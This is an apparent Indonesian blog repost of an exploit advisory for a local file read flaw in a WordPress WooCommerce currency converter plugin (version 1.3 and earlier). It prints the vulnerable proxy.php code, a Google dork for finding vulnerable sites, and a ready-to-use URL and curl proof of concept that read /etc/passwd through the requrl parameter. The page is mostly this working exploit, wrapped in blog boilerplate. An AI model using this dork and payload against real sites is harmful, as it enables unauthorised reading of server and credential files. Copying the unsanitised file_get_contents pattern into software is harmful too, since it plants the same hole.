Judul : WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read 2016
link : WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read 2016
WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read 2016
 |
| WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read |
# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link:
https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
Description:
proxy.php's code:
<?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
Based on user input, the content of a file is printed out (unfortunately
not included) so any html file can be loaded, and an attacker may be able
to read any local file which
is not executed in the server.
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwdDemikianlah Artikel WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read 2016
Sekianlah artikel WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read 2016 kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel lainnya.
Anda sekarang membaca artikel WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read 2016 dengan alamat link https://indonesia-darknet.blogspot.com/2016/10/wordpress-paypal-currency-converter.html
0 Response to "WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read 2016"
Posting Komentar